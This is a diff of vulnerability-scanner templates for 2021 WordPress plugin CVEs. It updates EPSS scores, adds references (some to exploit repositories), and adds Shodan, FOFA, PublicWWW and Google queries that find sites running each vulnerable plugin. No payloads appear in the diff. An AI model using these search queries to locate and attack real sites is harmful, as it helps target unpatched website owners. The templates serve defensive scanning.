74cc20d62f..e7c9fbea8e 100644 --- a/http/cves/2021/CVE-2021-24287.yaml +++ b/http/cves/2021/CVE-2021-24287.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24287 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.60494 + epss-percentile: 0.61154 cpe: cpe:2.3:a:mooveagency:select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml index 5c4fd0d54d..0ec9ba6c6a 100644 --- a/http/cves/2021/CVE-2021-24288.yaml +++ b/http/cves/2021/CVE-2021-24288.yaml @@ -12,13 +12,15 @@ info: reference: - https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97 - https://nvd.nist.gov/vuln/detail/CVE-2021-24288 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24288 cwe-id: CWE-601 - epss-score: 0.00129 - epss-percentile: 0.47456 + epss-score: 0.00137 + epss-percentile: 0.49121 cpe: cpe:2.3:a:acymailing:acymailing:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index ce684b06b9..3d9a76faf9 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml @@ -27,6 +27,9 @@ info: vendor: 10web product: photo_gallery framework: wordpress + publicwww-query: /wp-content/plugins/photo-gallery + shodan-query: http.html:/wp-content/plugins/photo-gallery + fofa-query: body=/wp-content/plugins/photo-gallery tags: cve2021,cve,photo,wpscan,packetstorm,xss,wordpress,wp-plugin,10web http: diff --git a/http/cves/2021/CVE-2021-24316.yaml b/http/cves/2021/CVE-2021-24316.yaml index 0acdffde58..ae31119e67 100644 --- a/http/cves/2021/CVE-2021-24316.yaml +++ b/http/cves/2021/CVE-2021-24316.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24316 cwe-id: CWE-79 epss-score: 0.00317 - epss-percentile: 0.69851 + epss-percentile: 0.70371 cpe: cpe:2.3:a:wowthemes:mediumish:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index 931e5c7568..da9d500fb7 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24320 cwe-id: CWE-79 - epss-score: 0.00116 - epss-percentile: 0.45256 + epss-score: 0.00123 + epss-percentile: 0.46682 cpe: cpe:2.3:a:bold-themes:bello:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: bello framework: wordpress tags: cve2021,cve,wordpress,xss,wp-plugin,wpscan,bold-themes - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index 8a3bc70e9e..246f436182 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -18,14 +18,18 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24340 cwe-id: CWE-89 - epss-score: 0.01937 - epss-percentile: 0.88371 + epss-score: 0.01606 + epss-percentile: 0.8741 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: veronalabs product: wp_statistics framework: wordpress + google-query: inurl:/wp-content/plugins/wp-statistics + publicwww-query: /wp-content/plugins/wp-statistics/ + shodan-query: http.html:/wp-content/plugins/wp-statistics/ + fofa-query: body=/wp-content/plugins/wp-statistics/ tags: cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs http: diff --git a/http/cves/2021/CVE-2021-24347.yaml b/http/cves/2021/CVE-2021-24347.yaml index 4177f7e372..6b88d58a1d 100644 --- a/http/cves/2021/CVE-2021-24347.yaml +++ b/http/cves/2021/CVE-2021-24347.yaml @@ -14,13 +14,14 @@ info: - https://wordpress.org/plugins/sp-client-document-manager/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24347 - http://packetstormsecurity.com/files/163434/WordPress-SP-Project-And-Document-Manager-4.21-Shell-Upload.html + - https://github.com/Hacker5preme/Exploits classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-24347 cwe-id: CWE-178 - epss-score: 0.97036 - epss-percentile: 0.99699 + epss-score: 0.96895 + epss-percentile: 0.99708 cpe: cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml index 6406ee8919..e4fea31b66 100644 --- a/http/cves/2021/CVE-2021-24351.yaml +++ b/http/cves/2021/CVE-2021-24351.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-24351 cwe-id: CWE-79 epss-score: 0.00154 - epss-percentile: 0.50743 + epss-percentile: 0.51646 cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24358.yaml b/http/cves/2021/CVE-2021-24358.yaml index 0a3d7635fd..c0a2c61d5f 100644 --- a/http/cves/2021/CVE-2021-24358.yaml +++ b/http/cves/2021/CVE-2021-24358.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24358 cwe-id: CWE-601 epss-score: 0.00329 - epss-percentile: 0.70388 + epss-percentile: 0.70913 cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index f91d354aeb..ce95bef48b 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24409 cwe-id: CWE-79 - epss-score: 0.00161 - epss-percentile: 0.51755 + epss-score: 0.00171 + epss-percentile: 0.54048 cpe: cpe:2.3:a:plugin-planet:prismatic:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: prismatic framework: wordpress publicwww-query: "/wp-content/plugins/prismatic" + shodan-query: http.html:/wp-content/plugins/prismatic + fofa-query: body=/wp-content/plugins/prismatic tags: cve2021,cve,wpscan,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet http: diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml index e8d4e6ca7e..f224704d68 100644 --- a/http/cves/2021/CVE-2021-24435.yaml +++ b/http/cves/2021/CVE-2021-24435.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24435 cwe-id: CWE-79 - epss-score: 0.0014 - epss-percentile: 0.4866 + epss-score: 0.00172 + epss-percentile: 0.54295 cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24442.yaml b/http/cves/2021/CVE-2021-24442.yaml index b27503e1ae..56fe01869c 100644 --- a/http/cves/2021/CVE-2021-24442.yaml +++ b/http/cves/2021/CVE-2021-24442.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24442 cwe-id: CWE-89 - epss-score: 0.00212 - epss-percentile: 0.58237 + epss-score: 0.1114 + epss-percentile: 0.95154 cpe: cpe:2.3:a:wpdevart:poll\,_survey\,_questionnaire_and_voting_system:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: poll\,_survey\,_questionnaire_and_voting_system framework: wordpress publicwww-query: "/wp-content/plugins/polls-widget/" + shodan-query: http.html:/wp-content/plugins/polls-widget/ + fofa-query: body=/wp-content/plugins/polls-widget/ tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli http: diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index 8745bb19f8..656326e427 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -30,6 +30,8 @@ info: product: kentharadio framework: wordpress publicwww-query: "/wp-content/plugins/qt-kentharadio" + shodan-query: http.html:/wp-content/plugins/qt-kentharadio + fofa-query: body=/wp-content/plugins/qt-kentharadio tags: cve2021,cve,wordpress,lfi,ssrf,wp,wp-plugin,wpscan,qantumthemes http: diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml index 576143e213..4369c05bbc 100644 --- a/http/cves/2021/CVE-2021-24495.yaml +++ b/http/cves/2021/CVE-2021-24495.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24495 cwe-id: CWE-79 - epss-score: 0.00116 - epss-percentile: 0.44405 + epss-score: 0.00123 + epss-percentile: 0.46682 cpe: cpe:2.3:a:marmoset:marmoset_viewer:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml index 0741c6bf0c..1b955e4576 100644 --- a/http/cves/2021/CVE-2021-24498.yaml +++ b/http/cves/2021/CVE-2021-24498.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24498 cwe-id: CWE-79 - epss-score: 0.00161 - epss-percentile: 0.51755 + epss-score: 0.00171 + epss-percentile: 0.54048 cpe: cpe:2.3:a:dwbooster:calendar_event_multi_view:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24510.yaml b/http/cves/2021/CVE-2021-24510.yaml index bb4e6305f1..5eddc3de2b 100644 --- a/http/cves/2021/CVE-2021-24510.yaml +++ b/http/cves/2021/CVE-2021-24510.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24510 cwe-id: CWE-79 - epss-score: 0.00143 - epss-percentile: 0.50097 + epss-score: 0.00119 + epss-percentile: 0.46132 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:*:*:*:*:wordpress:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index eb76bcf50c..aae98ac483 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24554 cwe-id: CWE-89 - epss-score: 0.20268 - epss-percentile: 0.95935 + epss-score: 0.3323 + epss-percentile: 0.97049 cpe: cpe:2.3:a:freelancetoindia:paytm-pay:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24627.yaml b/http/cves/2021/CVE-2021-24627.yaml index 23ec47cec5..83bf3b7bc4 100644 --- a/http/cves/2021/CVE-2021-24627.yaml +++ b/http/cves/2021/CVE-2021-24627.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24627 cwe-id: CWE-89 - epss-score: 0.14515 - epss-percentile: 0.95609 + epss-score: 0.30355 + epss-percentile: 0.96947 cpe: cpe:2.3:a:g_auto-hyperlink_project:g_auto-hyperlink:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: g_auto-hyperlink framework: wordpress publicwww-query: /wp-content/plugins/g-auto-hyperlink/ + shodan-query: http.html:/wp-content/plugins/g-auto-hyperlink/ + fofa-query: body=/wp-content/plugins/g-auto-hyperlink/ tags: cve2021,cve,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated,g_auto-hyperlink_project variables: num: 999999999 diff --git a/http/cves/2021/CVE-2021-24647.yaml b/http/cves/2021/CVE-2021-24647.yaml index c5ea07681d..cd5ba49a13 100644 --- a/http/cves/2021/CVE-2021-24647.yaml +++ b/http/cves/2021/CVE-2021-24647.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.1 cve-id: CVE-2021-24647 cwe-id: CWE-287 - epss-score: 0.22598 - epss-percentile: 0.96397 + epss-score: 0.20385 + epss-percentile: 0.96356 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml index 34085ea7cf..c1fb04e22b 100644 --- a/http/cves/2021/CVE-2021-24731.yaml +++ b/http/cves/2021/CVE-2021-24731.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24731 cwe-id: CWE-89 - epss-score: 0.14786 - epss-percentile: 0.95651 + epss-score: 0.25417 + epss-percentile: 0.96689 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-24746.yaml b/http/cves/2021/CVE-2021-24746.yaml index e70a4f07bc..59d52e2340 100644 --- a/http/cves/2021/CVE-2021-24746.yaml +++ b/http/cves/2021/CVE-2021-24746.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24746 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:heateor:sassy_social_share:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml index 3d3f91006c..1ebbaa838e 100644 --- a/http/cves/2021/CVE-2021-24750.yaml +++ b/http/cves/2021/CVE-2021-24750.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-24750 cwe-id: CWE-89 - epss-score: 0.02112 - epss-percentile: 0.8802 + epss-score: 0.02059 + epss-percentile: 0.88991 cpe: cpe:2.3:a:wp_visitor_statistics_\(real_time_traffic\)_project:wp_visitor_statistics_\(real_time_traffic\):*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml index f6960c5ac3..3b46901aee 100644 --- a/http/cves/2021/CVE-2021-24838.yaml +++ b/http/cves/2021/CVE-2021-24838.yaml @@ -13,13 +13,15 @@ info: reference: - https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82 - https://nvd.nist.gov/vuln/detail/CVE-2021-24838 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24838 cwe-id: CWE-601 epss-score: 0.00106 - epss-percentile: 0.42838 + epss-percentile: 0.43227 cpe: cpe:2.3:a:bologer:anycomment:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24849.yaml b/http/cves/2021/CVE-2021-24849.yaml index deee9aec79..eacd0704ad 100644 --- a/http/cves/2021/CVE-2021-24849.yaml +++ b/http/cves/2021/CVE-2021-24849.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24849 cwe-id: CWE-89 epss-score: 0.02367 - epss-percentile: 0.89583 + epss-percentile: 0.89814 cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible framework: wordpress publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace" + shodan-query: http.html:/wp-content/plugins/wc-multivendor-marketplace + fofa-query: body=/wp-content/plugins/wc-multivendor-marketplace tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index 1f03c3cb18..a25744d26b 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24862 cwe-id: CWE-89 - epss-score: 0.72686 - epss-percentile: 0.97816 + epss-score: 0.71273 + epss-percentile: 0.98052 cpe: cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml index 523b7e7fbc..f6b3138b75 100644 --- a/http/cves/2021/CVE-2021-24875.yaml +++ b/http/cves/2021/CVE-2021-24875.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24875 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.50097 + epss-percentile: 0.50073 cpe: cpe:2.3:a:implecode:ecommerce_product_catalog:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index adeac5087a..e17238227a 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -14,13 +14,14 @@ info: - https://www.jbelamor.com/xss-elementor-lightox.html - https://wpscan.com/vulnerability/fbed0daa-007d-4f91-8d87-4bca7781de2d - https://nvd.nist.gov/vuln/detail/CVE-2021-24891 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24891 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45185 + epss-percentile: 0.45236 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 @@ -28,7 +29,6 @@ info: product: website_builder framework: wordpress tags: cve2021,cve,wordpress,wp-plugin,elementor,wpscan,dom,xss - flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-24915.yaml b/http/cves/2021/CVE-2021-24915.yaml index c52440bb78..c7b59060d0 100644 --- a/http/cves/2021/CVE-2021-24915.yaml +++ b/http/cves/2021/CVE-2021-24915.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24915 cwe-id: CWE-89 - epss-score: 0.22351 - epss-percentile: 0.96057 + epss-score: 0.25422 + epss-percentile: 0.9669 cpe: cpe:2.3:a:contest_gallery:contest_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: contest_gallery framework: wordpress publicwww-query: "/wp-content/plugins/contest-gallery/" + shodan-query: http.html:/wp-content/plugins/contest-gallery/ + fofa-query: body=/wp-content/plugins/contest-gallery/ tags: cve2021,cve,wordpress,wp-plugin,wpscan,wp,contest-gallery,contest_gallery,sqli http: diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml index 28a468b30b..f08202d415 100644 --- a/http/cves/2021/CVE-2021-24917.yaml +++ b/http/cves/2021/CVE-2021-24917.yaml @@ -12,13 +12,15 @@ info: - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375 - https://nvd.nist.gov/vuln/detail/CVE-2021-24917 - https://wordpress.org/support/topic/bypass-security-issue/ + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-24917 cwe-id: CWE-863 - epss-score: 0.03563 - epss-percentile: 0.90675 + epss-score: 0.04098 + epss-percentile: 0.92139 cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24926.yaml b/http/cves/2021/CVE-2021-24926.yaml index 8e4826b49b..2acffb37c4 100644 --- a/http/cves/2021/CVE-2021-24926.yaml +++ b/http/cves/2021/CVE-2021-24926.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24926 cwe-id: CWE-79 epss-score: 0.00171 - epss-percentile: 0.53153 + epss-percentile: 0.54011 cpe: cpe:2.3:a:domaincheckplugin:domain_check:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml index 6eb73e7bd6..7f6c46512c 100644 --- a/http/cves/2021/CVE-2021-24940.yaml +++ b/http/cves/2021/CVE-2021-24940.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24940 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42899 + epss-percentile: 0.43227 cpe: cpe:2.3:a:woocommerce:persian-woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24943.yaml b/http/cves/2021/CVE-2021-24943.yaml index b85b13fc17..a81863dedf 100644 --- a/http/cves/2021/CVE-2021-24943.yaml +++ b/http/cves/2021/CVE-2021-24943.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24943 cwe-id: CWE-89 - epss-score: 0.21158 - epss-percentile: 0.96299 + epss-score: 0.20551 + epss-percentile: 0.96367 cpe: cpe:2.3:a:roundupwp:registrations_for_the_events_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: registrations_for_the_events_calendar framework: wordpress publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/" + shodan-query: http.html:/wp-content/plugins/registrations-for-the-events-calendar/ + fofa-query: body=/wp-content/plugins/registrations-for-the-events-calendar/ tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar variables: text: "{{rand_base(5)}}" diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index 77765a0524..f284ecda8b 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24946 cwe-id: CWE-89 - epss-score: 0.12445 - epss-percentile: 0.94942 + epss-score: 0.11865 + epss-percentile: 0.95325 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml index 9796ad8438..d7e1e07bba 100644 --- a/http/cves/2021/CVE-2021-24947.yaml +++ b/http/cves/2021/CVE-2021-24947.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-24947 cwe-id: CWE-352,CWE-863 - epss-score: 0.00315 - epss-percentile: 0.69672 + epss-score: 0.00398 + epss-percentile: 0.73461 cpe: cpe:2.3:a:thinkupthemes:responsive_vector_maps:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml index cdc485b1ed..47631179bd 100644 --- a/http/cves/2021/CVE-2021-24970.yaml +++ b/http/cves/2021/CVE-2021-24970.yaml @@ -13,13 +13,14 @@ info: - https://wpscan.com/vulnerability/9b15d47e-43b6-49a8-b2c3-b99c92101e10 - https://wordpress.org/plugins/all-in-one-video-gallery - https://nvd.nist.gov/vuln/detail/CVE-2021-24970 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-24970 cwe-id: CWE-22 - epss-score: 0.03639 - epss-percentile: 0.90767 + epss-score: 0.0297 + epss-percentile: 0.90861 cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24979.yaml b/http/cves/2021/CVE-2021-24979.yaml index 7ec3b86095..462f0b3242 100644 --- a/http/cves/2021/CVE-2021-24979.yaml +++ b/http/cves/2021/CVE-2021-24979.yaml @@ -26,6 +26,9 @@ info: product: paid_memberships_pro framework: wordpress publicwww-query: /wp-content/plugins/paid-memberships-pro/ + shodan-query: http.html:/wp-content/plugins/paid-memberships-pro/ + fofa-query: body=/wp-content/plugins/paid-memberships-pro/ + google-query: inurl:"/wp-content/plugins/paid-memberships-pro" tags: cve2021,cve,wp,wordpress,wpscan,wp-plugin,xss,authenticated,strangerstudios http: diff --git a/http/cves/2021/CVE-2021-25003.yaml b/http/cves/2021/CVE-2021-25003.yaml index 991a425d77..83d6467a16 100644 --- a/http/cves/2021/CVE-2021-25003.yaml +++ b/http/cves/2021/CVE-2021-25003.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-25003 cwe-id: CWE-434,CWE-94 - epss-score: 0.61252 - epss-percentile: 0.97725 + epss-score: 0.61181 + epss-percentile: 0.97795 cpe: cpe:2.3:a:wptaskforce:wpcargo_track_\&_trace:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml index 2223d5342d..352c776b7b 100644 --- a/http/cves/2021/CVE-2021-25008.yaml +++ b/http/cves/2021/CVE-2021-25008.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25008 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42122 + epss-percentile: 0.43227 cpe: cpe:2.3:a:codesnippets:code_snippets:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25016.yaml b/http/cves/2021/CVE-2021-25016.yaml index 5495d8a66f..e92757d723 100644 --- a/http/cves/2021/CVE-2021-25016.yaml +++ b/http/cves/2021/CVE-2021-25016.yaml @@ -26,6 +26,8 @@ info: product: chaty framework: wordpress publicwww-query: "/wp-content/plugins/chaty/" + shodan-query: http.html:/wp-content/plugins/chaty/ + fofa-query: body=/wp-content/plugins/chaty/ tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio http: diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml index 801f97ef93..2908de28bf 100644 --- a/http/cves/2021/CVE-2021-25033.yaml +++ b/http/cves/2021/CVE-2021-25033.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25033 cwe-id: CWE-601 epss-score: 0.001 - epss-percentile: 0.40139 + epss-percentile: 0.41295 cpe: cpe:2.3:a:noptin:noptin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml index ac3db17e5e..ac1d045abd 100644 --- a/http/cves/2021/CVE-2021-25052.yaml +++ b/http/cves/2021/CVE-2021-25052.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-25052 cwe-id: CWE-352 epss-score: 0.01998 - epss-percentile: 0.88568 + epss-percentile: 0.88806 cpe: cpe:2.3:a:wow-company:button_generator:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml index 0a98c205c0..fdaad78ff7 100644 --- a/http/cves/2021/CVE-2021-25063.yaml +++ b/http/cves/2021/CVE-2021-25063.yaml @@ -12,13 +12,15 @@ info: reference: - https://wpscan.com/vulnerability/e2185887-3e53-4089-aa3f-981c944ee0bb - https://nvd.nist.gov/vuln/detail/CVE-2021-25063 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-25063 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42838 + epss-percentile: 0.43227 cpe: cpe:2.3:a:cf7skins:contact_form_7_skins:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index b93d7867d1..95412664b1 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25065 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.2831 + epss-percentile: 0.29862 cpe: cpe:2.3:a:smashballoon:smash_balloon_social_post_feed:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: smash_balloon_social_post_feed framework: wordpress publicwww-query: "/wp-content/plugins/custom-facebook-feed/" + shodan-query: http.html:/wp-content/plugins/custom-facebook-feed/ + fofa-query: body=/wp-content/plugins/custom-facebook-feed/ tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon http: diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml index 2e52fe0e79..0aa6bc1c92 100644 --- a/http/cves/2021/CVE-2021-25067.yaml +++ 